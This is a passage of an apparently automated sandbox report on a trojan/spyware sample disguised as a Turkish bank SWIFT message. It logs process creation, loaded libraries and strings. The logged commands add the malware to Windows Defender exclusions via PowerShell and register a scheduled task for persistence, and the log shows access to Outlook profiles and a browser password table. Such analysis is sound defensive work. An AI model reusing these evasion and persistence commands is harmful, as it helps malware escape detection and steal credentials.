            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, X2PtWR8nM7XgLEsiB1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, X2PtWR8nM7XgLEsiB1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, X2PtWR8nM7XgLEsiB1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, X2PtWR8nM7XgLEsiB1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, X2PtWR8nM7XgLEsiB1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, X2PtWR8nM7XgLEsiB1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/23@2/2
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile created: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMutant created: \Sessions\1\BaseNamedObjects\swsFvyWbYbLCSFbrzYSJOkhPg
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6396
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5520
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE679.tmpJump to behavior
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Ziraat Bankasi Swift Mesaji.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003148000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003138000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4524082137.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.000000000317E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003156000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.000000000318A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Ziraat Bankasi Swift Mesaji.exeVirustotal: Detection: 36%
            Source: Ziraat Bankasi Swift Mesaji.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1764
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1304
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeSection loaded: windowscodecs.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: Ziraat Bankasi Swift Mesaji.exeStatic file information: File size 1084416 > 1048576
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x100400
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Accessibility.pdbj source: WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: XfbOZ.pdb source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
            Source: Binary string: Accessibility.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdbt source: WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: XfbOZ.pdbSHA256 source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
            Source: Binary string: System.Configuration.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Xml.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: Accessibility.pdbE source: WER79E4.tmp.dmp.16.dr
            Source: Binary string: System.Drawing.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.pdb4 source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Core.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.pdbH source: WER79E4.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr

            Data Obfuscation

            barindex
